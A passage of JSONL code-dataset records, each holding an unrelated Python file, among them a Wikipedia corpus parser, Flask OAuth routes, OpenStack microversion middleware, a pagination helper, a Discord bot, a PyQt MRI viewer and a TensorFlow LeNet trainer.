'__main__':\n program = os.path.basename(sys.argv[0])\n logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(program)\n logger.info('running ' + program + ': parse the chinese corpus')\n\n # define the filename of input and output\n infile = 'data/zhwiki-20191120-pages-articles-multistream.xml.bz2'\n outfile = 'data/zhwiki.txt'\n\n # transform .XML to .txt\n i = 0\n output = open(outfile, 'w')\n wiki = WikiCorpus(infile, lemmatize=False, dictionary={})\n for text in wiki.get_texts():\n output.write(\" \".join(text) + \"\\n\")\n i = i + 1\n if i % 10000 == 0:\n logging.info(\"Save \" + str(i) + \" articles\")\n output.close()\n logging.info(\"Finished saved \" + str(i) + \"articles\")\n","sub_path":"XML2txt.py","file_name":"XML2txt.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"72707258","text":"\r\nimport glob, os, shutil\r\nfrom datetime import *\r\nimport time\r\nimport timestring\r\n\r\nRootDir1 = r'Y:/30_Park_Pilot/06_Statii/540 Flash/00_Log files'\r\nTargetFolder = r'C:/DAN/01_Work/LP Flash/00_log_files/00_Data_Source/01_Flash540'\r\n\r\nweek = timestring.Date('27 Mar 2014 12:32:29 GMT').year\r\nprint (week)\r\n\r\nfor root, dirs, files in os.walk((os.path.normpath(RootDir1)), topdown=False):\r\n for name in files:\r\n path = os.path.join(root,name)\r\n #print (name)\r\n date = os.path.getctime(path)\r\n \r\n times = time.localtime()\r\n print (times)\r\n ARN, extension = os.path.splitext(name)\r\n link = os.path.join(TargetFolder,name)\r\n SourceFolder = os.path.join(root,name)\r\n 
#print (SourceFolder)\r\n current_time = time.time()\r\n #timedelta (current_time, date)\r\n #print (timedelta)\r\n #print (2 + current_time)\r\n days = (current_time - date)//(24 * 3600)\r\n #print(days)\r\n if (days)<= 10:\r\n print (\"New file found\")\r\n print (days) \r\n if os.path.exists(link):\r\n print (\"log duplicate\")\r\n file = os.path.join(TargetFolder, ARN)\r\n linkfn = os.path.join(TargetFolder, name)\r\n if os.path.exists(linkfn):\t\r\n i = 1\r\n #print (\"Path exists already\")\r\n while os.path.exists(file + \"(\"+ str(i)+ \")\" + extension):\r\n i+=1\r\n #print (\"Already 2x exists...\")\r\n print (ARN + \"Renaming\")\r\n shutil.copy2(SourceFolder, file + \"(\"+ str(i) + \")\" +extension)\r\n else: \r\n shutil.copy2(SourceFolder, TargetFolder)\t\t\t\t\r\n print (ARN + \" \" + \" copied\")\r\n else:\r\n # pass\r\n print (\"Older files\")\r\n else:\r\n\t\t \r\n print (ARN + \" \" + \"Wrong folder/format\") ","sub_path":"02_python_files/04_Handle_Data/01_Group_by/Copy_Time_1 day.py","file_name":"Copy_Time_1 day.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"63910885","text":"\nfrom flask import Flask, g, request, redirect, render_template, Response, session\n\n\nfrom weiboHandle import *\nfrom qqweiboHandle import *\n\n\napp = Flask(__name__)\napp.debug = True\n\n@app.route('/')\ndef home_page():\n return render_template( 'home_page.html', content = 'hello world' )\n\n@app.route('/login_to_weibo')\ndef login_to_weibo():\n\turl = loginWeibo()\n\treturn redirect( url )\n\t\n\n@app.route('/oauth_weibo', methods = ['POST', 'GET'])\ndef oauth_weibo():\n\tif request.method == \"GET\":\n\t\tcode = request.args.get(\"code\")\n\t\tcontent = getAccessToken( code )\n\t\treturn render_template( 'home_page.html', content_weibo = content )\n\n\n@app.route('/login_to_qq')\ndef login_to_qq():\n url = loginQq()\n return redirect( url )\n\n@app.route('/oauth_qq', methods = ['POST', 'GET'])\ndef oauth_qq():\n if request.method == \"GET\":\n code = request.args.get('code')\n open_id = request.args.get('openid')\n content = getQQAccessToken( code, open_id )\n return render_template( 'home_page.html', content_qq = content )","sub_path":"1/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"25303390","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Microversion handling.\"\"\"\n\n# NOTE(cdent): This code is taken from enamel:\n# https://github.com/jaypipes/enamel and was the original source of\n# the code now used in microversion_parse library.\n\nimport collections\nimport inspect\n\nimport microversion_parse\nimport webob\n\n# NOTE(cdent): avoid cyclical import conflict between util and\n# microversion\nimport nova.api.openstack.placement.util\nfrom nova.i18n import _\n\n\nSERVICE_TYPE = 'placement'\nMICROVERSION_ENVIRON = '%s.microversion' % 
SERVICE_TYPE\nVERSIONED_METHODS = collections.defaultdict(list)\n\n# The Canonical Version List\nVERSIONS = [\n '1.0',\n '1.1', # initial support for aggregate.get_aggregates and set_aggregates\n '1.2', # Adds /resource_classes resource endpoint\n '1.3', # Adds 'member_of' query parameter to get resource providers\n # that are members of any of the listed aggregates\n '1.4', # Adds resources query string parameter in GET /resource_providers\n '1.5', # Adds DELETE /resource_providers/{uuid}/inventories\n '1.6', # Adds /traits and /resource_providers{uuid}/traits resource\n # endpoints\n '1.7', # PUT /resource_classes/{name} is bodiless create or update\n '1.8', # Adds 'project_id' and 'user_id' required request parameters to\n # PUT /allocations\n '1.9', # Adds GET /usages\n '1.10', # Adds GET /allocation_candidates resource endpoint\n '1.11', # Adds 'allocations' link to the GET /resource_providers response\n '1.12', # Add project_id and user_id to GET /allocations/{consumer_uuid}\n # and PUT to /allocations/{consumer_uuid} in the same dict form\n # as GET. The 'allocation_requests' format in GET\n # /allocation_candidates is updated to be the same as well.\n '1.13', # Adds POST /allocations to set allocations for multiple consumers\n '1.14', # Adds parent and root provider UUID on resource provider\n # representation and 'in_tree' filter on GET /resource_providers\n '1.15', # Include last-modified and cache-control headers\n]\n\n\ndef max_version_string():\n return VERSIONS[-1]\n\n\ndef min_version_string():\n return VERSIONS[0]\n\n\ndef parse_version_string(version_string):\n \"\"\"Turn a version string into a Version\n\n :param version_string: A string of two numerals, X.Y, or 'latest'\n :returns: a Version\n :raises: TypeError\n \"\"\"\n if version_string == 'latest':\n version_string = max_version_string()\n try:\n # The combination of int and a limited split with the\n # named tuple means that this incantation will raise\n # ValueError or TypeError when the incoming data is\n # poorly formed but will, however, naturally adapt to\n # extraneous whitespace.\n return Version(*(int(value) for value\n in version_string.split('.', 1)))\n except (ValueError, TypeError) as exc:\n raise TypeError('invalid version string: %s; %s' % (\n version_string, exc))\n\n\nclass MicroversionMiddleware(object):\n \"\"\"WSGI middleware for getting microversion info.\"\"\"\n\n def __init__(self, application):\n self.application = application\n\n @webob.dec.wsgify\n def __call__(self, req):\n util = nova.api.openstack.placement.util\n try:\n microversion = extract_version(req.headers)\n except ValueError as exc:\n raise webob.exc.HTTPNotAcceptable(\n _('Invalid microversion: %(error)s') % {'error': exc},\n json_formatter=util.json_error_formatter)\n except TypeError as exc:\n raise webob.exc.HTTPBadRequest(\n _('Invalid microversion: %(error)s') % {'error': exc},\n json_formatter=util.json_error_formatter)\n\n req.environ[MICROVERSION_ENVIRON] = microversion\n microversion_header = '%s %s' % (SERVICE_TYPE, microversion)\n\n try:\n response = req.get_response(self.application)\n except webob.exc.HTTPError as exc:\n # If there was an error in the application we still need\n # to send the microversion header, so add the header and\n # re-raise the exception.\n exc.headers.add(Version.HEADER, microversion_header)\n raise exc\n\n response.headers.add(Version.HEADER, microversion_header)\n response.headers.add('vary', Version.HEADER)\n return response\n\n\nclass Version(collections.namedtuple('Version', 'major 
minor')):\n \"\"\"A namedtuple containing major and minor values.\n\n Since it is a tuple is automatically comparable.\n \"\"\"\n\n HEADER = 'OpenStack-API-Version'\n\n MIN_VERSION = None\n MAX_VERSION = None\n\n def __str__(self):\n return '%s.%s' % (self.major, self.minor)\n\n @property\n def max_version(self):\n if not self.MAX_VERSION:\n self.MAX_VERSION = parse_version_string(max_version_string())\n return self.MAX_VERSION\n\n @property\n def min_version(self):\n if not self.MIN_VERSION:\n self.MIN_VERSION = parse_version_string(min_version_string())\n return self.MIN_VERSION\n\n def matches(self, min_version=None, max_version=None):\n if min_version is None:\n min_version = self.min_version\n if max_version is None:\n max_version = self.max_version\n return min_version <= self <= max_version\n\n\ndef extract_version(headers):\n \"\"\"Extract the microversion from Version.HEADER\n\n There may be multiple headers and some which don't match our\n service.\n \"\"\"\n found_version = microversion_parse.get_version(headers,\n service_type=SERVICE_TYPE)\n\n version_string = found_version or min_version_string()\n request_version = parse_version_string(version_string)\n # We need a version that is in VERSION and within MIX and MAX.\n # This gives us the option to administratively disable a\n # version if we really need to.\n if (str(request_version) in VERSIONS and request_version.matches()):\n return request_version\n raise ValueError('Unacceptable version header: %s' % version_string)\n\n\n# From twisted\n# https://github.com/twisted/twisted/blob/trunk/twisted/python/deprecate.py\ndef _fully_qualified_name(obj):\n \"\"\"Return the fully qualified name of a module, class, method or function.\n\n Classes and functions need to be module level ones to be correctly\n qualified.\n \"\"\"\n try:\n name = obj.__qualname__\n except AttributeError:\n name = obj.__name__\n\n if inspect.isclass(obj) or inspect.isfunction(obj):\n moduleName = obj.__module__\n return \"%s.%s\" % (moduleName, name)\n elif inspect.ismethod(obj):\n try:\n cls = obj.im_class\n except AttributeError:\n # Python 3 eliminates im_class, substitutes __module__ and\n # __qualname__ to provide similar information.\n return \"%s.%s\" % (obj.__module__, obj.__qualname__)\n else:\n className = _fully_qualified_name(cls)\n return \"%s.%s\" % (className, name)\n return name\n\n\ndef _find_method(f, version, status_code):\n \"\"\"Look in VERSIONED_METHODS for method with right name matching version.\n\n If no match is found a HTTPError corresponding to status_code will\n be returned.\n \"\"\"\n qualified_name = _fully_qualified_name(f)\n # A KeyError shouldn't be possible here, but let's be robust\n # just in case.\n method_list = VERSIONED_METHODS.get(qualified_name, [])\n for min_version, max_version, func in method_list:\n if min_version <= version <= max_version:\n return func\n\n raise webob.exc.status_map[status_code]\n\n\ndef version_handler(min_ver, max_ver=None, status_code=404):\n \"\"\"Decorator for versioning API methods.\n\n Add as a decorator to a placement API handler to constrain\n the microversions at which it will run. Add after the\n ``wsgify`` decorator.\n\n This does not check for version intersections. 
That's the\n domain of tests.\n\n :param min_ver: A string of two numerals, X.Y indicating the\n minimum version allowed for the decorated method.\n :param max_ver: A string of two numerals, X.Y, indicating the\n maximum version allowed for the decorated method.\n :param status_code: A status code to indicate error, 404 by default\n \"\"\"\n def decorator(f):\n min_version = parse_version_string(min_ver)\n if max_ver:\n max_version = parse_version_string(max_ver)\n else:\n max_version = parse_version_string(max_version_string())\n qualified_name = _fully_qualified_name(f)\n VERSIONED_METHODS[qualified_name].append(\n (min_version, max_version, f))\n\n def decorated_func(req, *args, **kwargs):\n version = req.environ[MICROVERSION_ENVIRON]\n return _find_method(f, version, status_code)(req, *args, **kwargs)\n\n # Sort highest min version to beginning of list.\n VERSIONED_METHODS[qualified_name].sort(key=lambda x: x[0],\n reverse=True)\n return decorated_func\n return decorator\n","sub_path":"nova/api/openstack/placement/microversion.py","file_name":"microversion.py","file_ext":"py","file_size_in_byte":9707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"312677707","text":"# we need to have two arrays to record maximum products and miniumum products\n\nfrom typing import List\n\nclass Solution:\n def maxProduct(self, nums: List[int]) -> int:\n N = len(nums)\n minDP = nums[0]\n maxDP = nums[0]\n \n ret = maxDP\n for i in range(1, N):\n minDP, maxDP = min(minDP * nums[i], maxDP * nums[i], nums[i]), max(minDP * nums[i], maxDP * nums[i], nums[i])\n ret = max(maxDP, ret)\n \n return ret\n \n \n def maxProduct1(self, nums: List[int]) -> int:\n N = len(nums)\n \n minDP = [0 for _ in range(N)]\n maxDP = [0 for _ in range(N)]\n minDP[0] = nums[0]\n maxDP[0] = nums[0]\n \n for i in range(1, N):\n minDP[i] = min(minDP[i - 1] * nums[i], maxDP[i - 1] * nums[i], nums[i])\n maxDP[i] = max(minDP[i - 1] * nums[i], maxDP[i - 1] * nums[i], nums[i])\n \n return max(maxDP)","sub_path":"leetcode/152-Maximum-Product-Subarray.py","file_name":"152-Maximum-Product-Subarray.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"335856371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 导入系统模块\n\n# 第三方模块\n\n# 导入自定义模块\n\n# 设置环境变量\n\n\nclass Pagination(object):\n def __init__(self, page, url_base, url_params, data_count, entries=10, show_pages=5):\n \"\"\"\n 分页初始化\n :param page: 当前页码\n :param url_base: 请求的URL基础部分\n :param url_params: 请求的URL参数部分\n :param data_count: 请求的数据总条数\n :param entries: 每页显示的记录条目数\n :param show_pages: 页码显示的页码,正负操作\n \"\"\"\n self.url_base = url_base\n try:\n self.page = int(page)\n # 如果页码数小于等于0,取1\n if self.page <= 0:\n raise Exception()\n except Exception as e:\n self.page = 1\n self.url_params = url_params\n self.page = page # 页码第X页\n self.entries = entries # 每页显示条目数量\n\n self.page_count, r = divmod(data_count, entries) # 页码的总数,根据记录总数和每页显示条目计算得出, 如果余数不为0,需增加一页\n if r != 0:\n self.page_count += 1\n\n self.show_pages = show_pages\n\n # 根据当前页码,计算页码起始,如果当前页 - 页面范围 小于0 起始为1 ,否则为差值\n self.page_index_start = self.page - self.show_pages if self.page > self.show_pages else 1\n # 根据当前页码,计算页码结束,如果当前页码 + 页面范围 小于 页面总数,则取加值,否则取 页面总数\n self.page_index_end = self.page + self.show_pages if (self.page + self.show_pages) < self.page_count else self.page_count\n\n @property\n def data_index_start(self):\n \"\"\"\n 数据获取值起始索引\n :return:\n \"\"\"\n return 
(self.page - 1) * self.entries\n\n    @property\n    def data_index_end(self):\n        \"\"\"\n        End index of the data slice for the current page\n        :return:\n        \"\"\"\n        return self.page * self.entries\n\n    def get_page_index_html(self, page_num, page_type='default'):\n\n        self.url_params['page'] = page_num\n\n        if page_type == 'default':\n            if self.page == page_num:\n                page_index_html = '<li class=\"active\"><a href=\"%s?%s\">%s</a></li>' \\n                                  % (self.url_base, self.url_params.urlencode(), page_num)\n            else:\n                page_index_html = '<li><a href=\"%s?%s\">%s</a></li>' \\n                                  % (self.url_base, self.url_params.urlencode(), page_num)\n        else:\n            if page_type == 'first':\n                icon = 'fa-step-backward'\n            elif page_type == 'prev':\n                icon = 'fa-angle-double-left'\n            elif page_type == 'next':\n                icon = 'fa-angle-double-right'\n            elif page_type == 'last':\n                icon = 'fa-step-forward'\n            else:\n                icon = ''\n            page_index_html = '
<li><a href=\"%s?%s\"><i class=\"fa %s\"></i></a></li>' \\n                              % (self.url_base, self.url_params.urlencode(), icon)\n\n        return page_index_html\n\n    def get_page_html(self):\n        \"\"\"\n        Generate the pagination HTML.\n        Layout [\n            per-page count | first prev 1 2 3 4 5 6 7 8 9 next last\n                    |<<     <    11 12 13 14 15 16 17 18 19 20 21    >    >>|\n        ]\n        :return:\n        \"\"\"\n        page_index_first = self.get_page_index_html(page_type='first', page_num=1)\n        page_index_last = self.get_page_index_html(page_type='last', page_num=self.page_count)\n\n        # Previous/next page setup\n        if self.page <= 1:\n            # If the requested page is <= 1, the previous-page link points to the current page\n            page_index_prev = self.get_page_index_html(page_type='prev', page_num=1)\n            page_index_next = self.get_page_index_html(page_type='next', page_num=self.page + 1)\n        elif self.page >= self.page_count:\n            # If the requested page is the last page, the next-page link stays on the last page\n            page_index_prev = self.get_page_index_html(page_type='prev', page_num=self.page - 1)\n            page_index_next = self.get_page_index_html(page_type='next', page_num=self.page_count)\n        else:\n            # Otherwise\n            # If the requested page is greater than 1, the previous-page link points to current page - 1, carrying the url params along\n            page_index_prev = self.get_page_index_html(page_type='prev', page_num=self.page - 1)\n            page_index_next = self.get_page_index_html(page_type='next', page_num=self.page + 1)\n\n        #\n        page_index_list = []\n        page_index_list.extend([page_index_first, page_index_prev])\n\n        for i in range(self.page_index_start, self.page_index_end + 1):\n            page_index_t = self.get_page_index_html(page_num=i)\n            page_index_list.append(page_index_t)\n\n        page_index_list.extend([page_index_next, page_index_last])\n\n        page_html_str = \"\".join(page_index_list)\n        return page_html_str\n","sub_path":"app_c_stark/utils/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"348630607","text":"import os\n\nimport pytest\nimport requests\nfrom urllib3.util.retry import Retry\n\nBUILDKITE = os.environ.get(\"BUILDKITE\") is not None\n\n\n@pytest.fixture\ndef retrying_requests():\n    session = requests.Session()\n    session.mount(\n        \"http://\", requests.adapters.HTTPAdapter(max_retries=Retry(total=5, backoff_factor=1))\n    )\n    yield session\n\n\n@pytest.fixture\ndef test_directory(request):\n    yield os.path.dirname(request.fspath)\n\n\n@pytest.fixture\ndef test_id(testrun_uid):\n    yield testrun_uid\n","sub_path":"python_modules/dagster-test/dagster_test/fixtures/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"244878266","text":"#bot.py\nimport os\n\nimport discord\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nimport pytz\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n    print(f'{client.user} has connected to Discord!')\n\n@client.event\nasync def on_message(message):\n    if message.author == client.user:\n        return\n    \n    if message.content == 'hello':\n        tz = pytz.timezone('Europe/Paris')\n        fmt = '%H:%M'\n        timeNow = datetime.now(tz)\n        if timeNow.hour > 0 and timeNow.hour < 6:\n            await message.channel.send('It is ' + f'{timeNow.strftime(fmt)}' + ' <@' + f'{message.author.id}' + '>' + \" why aren't you sleeping?\" 
)\n else:\n return\n\nclient.run(TOKEN)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"28699635","text":"\"\"\"\nMain View Controller\n\n@author: Yolanda Vives\n\n@status: Sets up the main view, its views and controllers\n@todo:\n\n\"\"\"\n#from PyQt5.QtWidgets import QPushButton\nfrom controller.operations import Operations\nfrom PyQt5.uic import loadUiType, loadUi\nimport sys\nsys.path.append('../marcos_client')\nimport cgitb \ncgitb.enable(format = 'text')\nimport pdb\nst = pdb.set_trace\nimport scipy.io\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox, QLabel, QVBoxLayout, QPushButton, QSpacerItem, QSizePolicy, QTextEdit\nfrom PyQt5.QtCore import pyqtSlot\nfrom utilities import change_axes\nimport numpy as np\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\nimport pyqtgraph.functions as fn\nfrom datetime import date, datetime \n\nMainWindow_Form, MainWindow_Base = loadUiType('ui/mainview_v2.ui')\n\nclass MainViewController(MainWindow_Form, MainWindow_Base):\n \"\"\"\n MainViewController Class\n \"\"\"\n \n def __init__(self):\n super(MainViewController, self).__init__()\n self.ui = loadUi('ui/mainview_v2.ui')\n self.setupUi(self)\n \n self.tab=Operations(self)\n self.layout_operations.addWidget(self.tab)\n \n # Toolbar Actions\n self.action_load.triggered.connect(self.load_file)\n self.action_save.triggered.connect(self.save)\n self.action_close.triggered.connect(self.close) \n self.action_plot.triggered.connect(self.plot3D) \n self.action_reload.triggered.connect(self.reload) \n \n # Status bar\n self.statusBar.showMessage('No file loaded')\n \n # Console\n self.cons = self.generateConsole('')\n\n# sys.stdout = EmittingStream(textWritten=self.onUpdateText)\n \n \n# sys.stderr = EmittingStream(textWritten=self.onUpdateText) \n\n \n @staticmethod\n def generateConsole(text):\n con = QTextEdit()\n con.setText(text)\n return con\n \n def onUpdateText(self, text):\n cursor = self.cons.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n cursor.insertText(text)\n self.cons.setTextCursor(cursor)\n self.cons.ensureCursorVisible()\n\n\n def close(self):\n sys.exit() \n \n def load_file(self):\n \n# self.clearPlotviewLayout()\n self.file_name, _ = QFileDialog.getOpenFileName(self, 'Open File', \"/share_vm/results_experiments/\")\n self.plot_title='K-Space (abs) loaded data'\n \n if self.file_name:\n self.data_loaded= scipy.io.loadmat(self.file_name)\n \n axes=self.data_loaded[\"axes\"]\n axis1=axes[0, 0]\n axis2=axes[0, 1]\n axis3=axes[0, 2]\n n=self.data_loaded[\"n\"]\n n1=n[0, 0]\n n2=n[0, 1]\n n3=n[0, 2]\n x, y, z, self.n_rd, self.n_ph, self.n_sl = change_axes(axis1,axis2,axis3,n1,n2,n3)\n self.ns = [self.n_rd, self.n_ph, self.n_sl]\n average=self.data_loaded[\"average\"]\n self.data_kS = np.reshape(average, (self.n_sl, self.n_ph, self.n_rd))\n self.data=self.data_kS\n \n self.statusBar.clearMessage()\n self.statusBar.showMessage(self.file_name)\n else:\n self.file=QLabel(\"No file loaded\")\n self.statusBar.addWidget(self.file)\n\n def save(self):\n \n dt = datetime.now()\n dt_string = dt.strftime(\"%d-%m-%Y_%H_%M\")\n# dict = vars(defaultsequences[self.sequence]) \n# \n# sequ = '%s' %(self.sequence)\n# sequ = sequ.replace(\" \", \"\")\n# f = open(\"experiments/parameterisations/%s_params_%s.txt\" % (sequ, dt_string),\"w\")\n# f.write( str(dict) )\n# f.close()\n \n 
self.messages(\"Saved\")\n\n \n def reload(self):\n \n self.data_loaded= scipy.io.loadmat(self.file_name)\n average=self.data_loaded[\"average\"]\n self.data_kS = np.reshape(average, (self.n_sl, self.n_ph, self.n_rd))\n self.data=self.data_kS\n self.plot_title='K-Space (abs) loaded data'\n self.plot3D()\n self.messages(\"Original file reloaded\") \n\n \n \n #############################################################\n ######################## 3D plot ###############################\n #############################################################\n \n def plot3D(self): \n \n self.clearLayoutPlots()\n \n self.layout_output.addWidget(self.cons)\n \n if hasattr(self, 'data'):\n t=np.iscomplex(self.data)\n if np.any(t):\n self.data3D=np.abs(self.data)\n else:\n self.data3D=self.data\n \n with np.errstate(divide = 'ignore'):\n positive = np.log(fn.clip_array(self.data3D, 0, self.data3D.max())**2)\n# negative = np.log(fn.clip_array(-fft, 0, -fft.min())**2)\n d2 = np.empty(self.data3D.shape + (4,), dtype=np.ubyte)\n d2[..., 0] = positive * (255./positive.max())\n d2[..., 1] = 0\n d2[..., 2] = d2[...,1]\n d2[..., 3] = d2[..., 0]*0.3 + d2[..., 1]*0.3\n d2[..., 3] = (d2[..., 3].astype(float) / 255.) **2 * 255\n\n d2[:, 0, 0] = [255,0,0,100]\n d2[0, :, 0] = [0,255,0,100]\n d2[0, 0, :] = [0,0,255,100]\n \n self.w = gl.GLViewWidget()\n v = gl.GLVolumeItem(d2)\n self.w.addItem(v)\n\n self.layout_plots.addWidget(self.w)\n \n #############################################################\n ######################## ImageView Plot ###########################\n #############################################################\n \n self.layout2 = QVBoxLayout()\n self.b1 = QPushButton('Change View', self)\n self.layout2.addWidget(self.b1)\n self.label = QLabel(\"%s\" % (self.plot_title))\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label.setStyleSheet(\"background-color: black;color: white\")\n self.layout2.addWidget(self.label)\n self.w1 = pg.ImageView()\n self.w1.setImage(self.data3D)\n self.roi = pg.RectROI([0, 0], [5,5], pen='r')\n# \n# value = self.w1.getRoiPlot()\n# print(value)\n self.w1.addItem(self.roi)\n\n self.layout2.addWidget(self.w1)\n self.layout_plots.addLayout(self.layout2)\n\n self.b1.clicked.connect(self.button_clicked)\n \n self.w1.roi.sigRegionChanged.connect(self.roi_avg)\n \n# selected = self.w1.roiChanged()\n# selected = self.roi.getArrayRegion(self.data3D, self.w1)\n# print(selected.mean(axis=0))\n \n else:\n self.messages(\"No data loaded\") \n \n @pyqtSlot()\n def roi_avg(self):\n for i in reversed(range(self.layout_plots.count())):\n if hasattr(self.layout_plots.itemAt(i).widget(), 'roi') :\n selected =self.layout_plots.itemAt(i).widget().roi.getArrayRegion(self.data,self.layout_plots.itemAt(i).widget().getImageItem(), axes=(0,1))\n nonzeroVals = selected[np.nonzero(selected)]\n print(np.mean(nonzeroVals))\n \n def messages(self, text):\n \n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(text)\n msg.exec();\n \n def clearLayoutPlots(self):\n \n for i in reversed(range(self.layout_plots.count())):\n if self.layout_plots.itemAt(i).layout():\n self.layout_plots.itemAt(i).layout().setParent(None)\n else:\n self.layout_plots.itemAt(i).widget().setParent(None)\n \n \n @pyqtSlot()\n def button_clicked(self):\n \n self.clearLayoutPlots()\n im = self.data\n self.data=np.moveaxis(im, 0, -1)\n \n self.b1.setChecked(False)\n self.plot3D()\n \nclass ImageView(pg.ImageView):\n\n # constructor which inherit original\n # ImageView\n def __init__(self, *args, 
**kwargs):\n pg.ImageView.__init__(self, *args, **kwargs)\n\n # roi changed method\n def roiChanged(self):\n\n # printing message\n print(\"ROI Changed\") \n# self.roi = pg.ImageView.getRoiPlot(self) \n# selected = self.roi.getArrayRegion(self.data, self.w1)\n# print(selected.mean(axis=0))\n \nclass EmittingStream(QtCore.QObject):\n\n textWritten = QtCore.pyqtSignal(str)\n\n def write(self, text):\n self.textWritten.emit(str(text))\n\n\n","sub_path":"controller/mainviewcontroller.py","file_name":"mainviewcontroller.py","file_ext":"py","file_size_in_byte":8732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"198786566","text":"import tensorflow as tf\nfrom tensorflow.keras import layers,datasets\nbatch_size = 128\nlr =0.01\nepoches = 10\nsum = 0\n(x,y) ,(x_test,y_test) = datasets.mnist.load_data()\n\ntrain_data = tf.data.Dataset.from_tensor_slices((x,y))\ntest_data = tf.data.Dataset.from_tensor_slices((x_test,y_test))\n\ntrain_data = train_data.shuffle(10000)\ntrain_data = train_data.batch(batch_size)\ntest_data = test_data.batch(batch_size)\ndef process(x,y):\n x = tf.cast(x,dtype=tf.float32)/255\n\n y = tf.cast(y,dtype = tf.int64)\n # y = tf.one_hot(y,depth=10)\n return x,y\n\ntrain_data = train_data.map(process)\ntest_data = test_data.map(process)\ncriteon = tf.losses.CategoricalCrossentropy(from_logits=True)\noptimer = tf.optimizers.SGD(lr)\ntf.optimizers.Adam()\n\n\n\n# class LeNet(tf.keras.Model):\n# def __init__(self):\n# super(LeNet, self).__init__()\n# self.con1 = layers.Conv2D(6,3,1)\n# self.cn2 = layers.Conv2D(16,3,1)\n\n\nnet = tf.keras.Sequential([layers.Conv2D(6,3,1),\n layers.MaxPool2D(2,2),\n layers.ReLU(),\n layers.Conv2D(6,3,1),\n layers.MaxPool2D(2,1),\n layers.ReLU(),\n layers.Flatten(),\n layers.Dense(120,activation = 'relu'),\n layers.Dense(84,activation='relu'),\n layers.Dense(10)])\n\nnet.build((4,28,28,1))\nnet.summary()\n\ndef train(data,epoch):\n for i in range(epoch):\n for x, y in data:\n x = tf.expand_dims(x, axis=3)\n with tf.GradientTape() as tape:\n out = net(x)\n y = tf.one_hot(y,depth=10)\n loss = criteon(y,out)\n grads = tape.gradient(loss,net.trainable_variables)\n optimer.apply_gradients(zip(grads,net.trainable_variables))\n predict(test_data,net)\n\ndef predict(db_test,network):\n correct, total = 0, 0\n for x, y in db_test:\n # 遍历所有训练集样本\n # 插入通道维度,=>[b,28,28,1]\n x = tf.expand_dims(x, axis=3) # 前向计算,获得 10 类别的预测分布,[b, 784] => [b, 10]\n out = network(x)\n # 真实的流程时先经过 softmax,再 argmax\n # 但是由于 softmax 不改变元素的大小相对关系,故省去\n pred = tf.argmax(out, axis=-1)\n y = tf.cast(y, tf.int64)\n # 统计预测正确数量\n correct += float(tf.reduce_sum(tf.cast(tf.equal(pred, y), tf.float32)))\n # 统计预测样本总数\n total += x.shape[0] # 计算准确率\n print('acc:',correct/total)\n\ntrain(train_data,epoches)","sub_path":"LeNet.py","file_name":"LeNet.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"610968386","text":"from pathlib import Path\n\nimport pytest\nfrom httpx import AsyncClient\n\nfrom quetz.authorization import (\n SERVER_MAINTAINER,\n SERVER_MEMBER,\n SERVER_OWNER,\n SERVER_USER,\n)\nfrom quetz.db_models import PackageVersion\nfrom quetz.jobs.models import Job, Task, TaskStatus\nfrom quetz.jobs.runner import check_status, run_jobs, run_tasks\n\n\n@pytest.mark.asyncio\nasync def test_transmutation_endpoint(\n api_key, db, config, work_manager, package_version, app, channel_name\n):\n\n # we need to use asynchronous http client because 
